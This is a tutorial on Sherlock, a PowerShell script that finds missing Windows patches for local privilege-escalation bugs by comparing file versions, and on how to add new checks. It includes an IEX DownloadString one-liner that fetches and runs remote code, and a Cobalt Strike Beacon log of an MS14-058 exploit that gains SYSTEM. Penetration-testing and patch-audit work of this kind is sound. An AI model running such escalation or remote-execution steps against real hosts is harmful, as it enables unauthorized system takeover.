Sherlock is a PowerShell script that checks a Windows host for missing patches tied to known local privilege escalation vulnerabilities; the vulnerabilities it currently covers are the ones listed in the `Find-AllVulns` output below. Load it from a local copy, or pull it straight from GitHub:

```powershell
Import-Module Sherlock.ps1
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1')
```

The second form downloads and executes whatever is on the `master` branch at that moment, so outside a lab, use a reviewed local copy (or pin the URL to a specific commit) rather than running the remote script blindly.
Run `Find-AllVulns` to execute every check:

```
PS C:\Users\Administrator> Find-AllVulns

Title      : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID      : 2010-0232
Link       : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems

Title      : Task Scheduler .XML
MSBulletin : MS10-092
CVEID      : 2010-3338, 2010-3888
Link       : https://www.exploit-db.com/exploits/19930/
VulnStatus : Not Vulnerable

Title      : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID      : 2013-1300
Link       : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID      : 2013-3881
Link       : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID      : 2014-4113
Link       : https://www.exploit-db.com/exploits/35101/
VulnStatus : Appears Vulnerable

Title      : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID      : 2015-1701, 2015-2433
Link       : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable

Title      : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID      : 2015-2426, 2015-2433
Link       : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable

Title      : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID      : 2016-0051
Link       : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems

Title      : Secondary Logon Handle
MSBulletin : MS16-032
CVEID      : 2016-0099
Link       : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable
```
`Appears Vulnerable` means the check found an unpatched file version, i.e. the fix for that bulletin appears to be missing. `Not Vulnerable` means the file version is at or past the fixed one, and `Not supported on 64-bit systems` means Sherlock skipped the file check because the public exploit it links to only targets 32-bit Windows, regardless of patch state. All of these verdicts come from comparing file versions, not from attempting the exploit.
Exploitation is done with a separate tool. Here the MS14-058 check reported `Appears Vulnerable`, so the matching exploit is launched from a Cobalt Strike Beacon console (`elevate` is a Beacon command, not a PowerShell one), spawning a new SMB beacon as SYSTEM:

```
beacon> elevate ms14-058 smb
[*] Tasked beacon to elevate and spawn windows/beacon_smb/bind_pipe (127.0.0.1:1337)
[+] host called home, sent: 105015 bytes
[+] received output:
[*] Getting Windows version...
[*] Solving symbols...
[*] Requesting Kernel loaded modules...
[*] pZwQuerySystemInformation required length 51216
[*] Parsing SYSTEM_INFO...
[*] 173 Kernel modules found
[*] Checking module \SystemRoot\system32\ntoskrnl.exe
[*] Good! nt found as ntoskrnl.exe at 0x0264f000
[*] ntoskrnl.exe loaded in userspace at: 40000000
[*] pPsLookupProcessByProcessId in kernel: 0xFFFFF800029A21FC
[*] pPsReferencePrimaryToken in kernel: 0xFFFFF800029A59D0
[*] Registering class...
[*] Creating window...
[*] Allocating null page...
[*] Getting PtiCurrent...
[*] Good! dwThreadInfoPtr 0xFFFFF900C1E7B8B0
[*] Creating a fake structure at NULL...
[*] Triggering vulnerability...
[!] Executing payload...
[+] host called home, sent: 204885 bytes
[+] established link to child beacon: 192.168.56.105
[+] established link to parent beacon: 192.168.56.105

beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 8 bytes
[*] You are NT AUTHORITY\SYSTEM (admin)
```
Privilege escalation succeeded. Keep in mind that Sherlock only identifies candidates; it does not exploit anything itself.
Besides the main functionality above, the script contains a few small helpers that the author does not document.

Sherlock can report the version of a file on disk: just run `Get-FileVersionInfo` with the path of the file as its argument, and it returns the `major.minor.build.revision` string from the file's version resource.

Demo:

Running `Get-Architecture` tells us whether Windows is 32-bit or 64-bit; it returns the operating-system architecture followed by the architecture of the current PowerShell process, which can differ when a 32-bit PowerShell runs on 64-bit Windows.

Demo:
Besides the vulnerabilities the author has already included, we can add checks for vulnerabilities we are interested in. Before adding one, let's look at how Sherlock's checks work.

In Sherlock, every vulnerability check is a `function`, of the form:

```powershell
function Find-MS16032 {
    # ... the check for this bulletin goes here ...
}
```

The function first calls `Get-Architecture`, which returns the operating-system architecture (`"64-bit"` or `"32-bit"`) as `$Architecture[0]` and the architecture of the current process (`"AMD64"` or `"x86"`) as `$Architecture[1]`. These decide both whether the exploit applies to this host at all and where the file to inspect lives; only if they match does the check proceed:

```powershell
$Architecture = Get-Architecture
if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" )
```

The condition is true when the process is native to the OS (a 64-bit process on 64-bit Windows, or any process on 32-bit Windows), so `%windir%\system32` holds the real file. A 32-bit PowerShell on 64-bit Windows is redirected to the WOW64 copy and has to read the file through `%windir%\sysnative` instead, otherwise it would be comparing the version of the wrong binary.

Next, `Get-FileVersionInfo` returns the version of the vulnerable file; the check keeps only the last two components, the build and the revision.
Then it's simply a matter of comparing the version with a `switch` plus `if`, one case per Windows build:

```powershell
switch ($Build) {
    7600 {   # Windows 7 / Server 2008 R2 RTM
        if ($Revision -ge "16000") {
            $VulnStatus = "Appears Vulnerable"
        }
    }
    7601 {   # Windows 7 SP1 / Server 2008 R2 SP1
        if ($Revision -le "23348") {
            $VulnStatus = "Appears Vulnerable"
        }
    }
    9200 {   # Windows 8 / Server 2012
        if ($Revision -le "21768") {
            $VulnStatus = "Appears Vulnerable"
        }
    }
    9600 {   # Windows 8.1 / Server 2012 R2
        if ($Revision -le "18230") {
            $VulnStatus = "Appears Vulnerable"
        }
    }
    10240 {  # Windows 10 1507
        if ($Revision -le "16724") {
            $VulnStatus = "Appears Vulnerable"
        }
    }
    10586 {  # Windows 10 1511
        if ($Revision -le "162") {
            $VulnStatus = "Appears Vulnerable"
        }
    }
    default {  # any other build: no rule, so report as patched
        $VulnStatus = "Not Vulnerable"
    }
}
```

`$Revision` is already an integer at this point, so the quoted thresholds are compared numerically, not as strings.
Adding our own vulnerability is then simple. First add a row for it in `New-ExploitTable` with the bulletin's title, bulletin ID, CVE and link; `Set-ExploitTable` only updates an existing row whose `MSBulletin` matches, so without that row the verdict is silently dropped. Then, as a test, create a `function Find-MS16135`:

```powershell
function Find-MS16135 {
    $MSBulletin = "MS16-135"
    # Stub for testing the wiring: it always reports vulnerable. A real check
    # would derive $VulnStatus from the file version, as Find-MS16032 does.
    $VulnStatus = "Appears Vulnerable"
    Set-ExploitTable $MSBulletin $VulnStatus
}
```

Then add a call to `Find-MS16135` inside `Find-AllVulns`, and that's it.
Test it:
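The whole procedure described above (architecture branch, file version parse, per-build comparison, and hand-off to Sherlock's result table), as an added, stand-alone example that is not part of Sherlock's own source. The helper names (`Get-NativeSystemFile`, `Get-BuildAndRevision`, `Test-FileVersionVulnerable`, `Find-MS16032Example`) are invented here; the rule table is transcribed from the MS16-032 switch block shown above, and the file it is applied to, `seclogon.dll` (the Secondary Logon service binary), is an assumption to confirm against the bulletin's file list. The one generalisation over the page's code is that the rules live in a hashtable of scriptblocks instead of a switch, so the same test function can be reused for any new bulletin by supplying its own file and thresholds.

```powershell
# Added example (not from Sherlock). Assumptions: helper names are invented,
# the MS16-032 rules are copied from the switch block above, and seclogon.dll
# is assumed to be the file that bulletin patches.

function Get-NativeSystemFile {
    # Path to the real system copy of a file under %windir%\system32.
    # A 32-bit PowerShell on 64-bit Windows has system32 redirected to SysWOW64
    # (WOW64 file-system redirection), so it must go through the
    # %windir%\sysnative alias to see the 64-bit binary we want to inspect.
    param([Parameter(Mandatory)][string]$FileName)

    if ([Environment]::Is64BitOperatingSystem -and -not [Environment]::Is64BitProcess) {
        return (Join-Path $env:windir "sysnative\$FileName")
    }
    return (Join-Path $env:windir "system32\$FileName")
}

function Get-BuildAndRevision {
    # Read build and revision from the file's version resource
    # (major.minor.build.revision, e.g. 6.1.7601.23349 -> build 7601, revision 23349).
    param([Parameter(Mandatory)][string]$Path)

    $vi = (Get-Item -LiteralPath $Path).VersionInfo
    [pscustomobject]@{
        Build    = [int]$vi.FileBuildPart
        Revision = [int]$vi.FilePrivatePart
    }
}

function Test-FileVersionVulnerable {
    # $Rules maps a Windows build number to a scriptblock that receives the
    # file's revision and returns $true while the file is still unpatched.
    # A build with no rule falls through to "Not Vulnerable", like Sherlock's
    # default branch. A missing file is reported as such rather than as a
    # verdict, because no version was actually compared.
    param(
        [Parameter(Mandatory)][string]$Path,
        [Parameter(Mandatory)][hashtable]$Rules
    )

    if (-not (Test-Path -LiteralPath $Path)) { return 'File not found' }

    $v    = Get-BuildAndRevision -Path $Path
    $rule = $Rules[$v.Build]
    if ($rule -and (& $rule $v.Revision)) { return 'Appears Vulnerable' }
    return 'Not Vulnerable'
}

# Per-build rules for MS16-032, transcribed from the switch block above.
$MS16032Rules = @{
    7600  = { param($r) $r -ge 16000 }   # Windows 7 / Server 2008 R2 RTM
    7601  = { param($r) $r -le 23348 }   # Windows 7 SP1 / Server 2008 R2 SP1
    9200  = { param($r) $r -le 21768 }   # Windows 8 / Server 2012
    9600  = { param($r) $r -le 18230 }   # Windows 8.1 / Server 2012 R2
    10240 = { param($r) $r -le 16724 }   # Windows 10 1507
    10586 = { param($r) $r -le 162 }     # Windows 10 1511
}

function Find-MS16032Example {
    # Same shape as a Sherlock Find-* function. If Sherlock is loaded in this
    # session, the verdict is also written into its result table through
    # Set-ExploitTable (which matches the existing MS16-032 row by bulletin ID);
    # otherwise the verdict is simply returned.
    $MSBulletin = 'MS16-032'
    $VulnStatus = Test-FileVersionVulnerable -Path (Get-NativeSystemFile 'seclogon.dll') -Rules $MS16032Rules

    if (Get-Command Set-ExploitTable -ErrorAction SilentlyContinue) {
        Set-ExploitTable $MSBulletin $VulnStatus
    }
    return $VulnStatus
}

Find-MS16032Example
```

To add a new bulletin, write its own rule table and a `Find-*` wrapper that calls `Test-FileVersionVulnerable` on the file that bulletin patches, then add the row in `New-ExploitTable` and the call in `Find-AllVulns` as described above. Like Sherlock itself, this compares file versions only; a host can still be protected by a mitigation the version check does not see, or be exposed through a file that was replaced outside of Windows Update, so treat `Appears Vulnerable` as a lead to confirm, not as proof.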
Source: http://www.tuicool.com/articles/UvEzYzb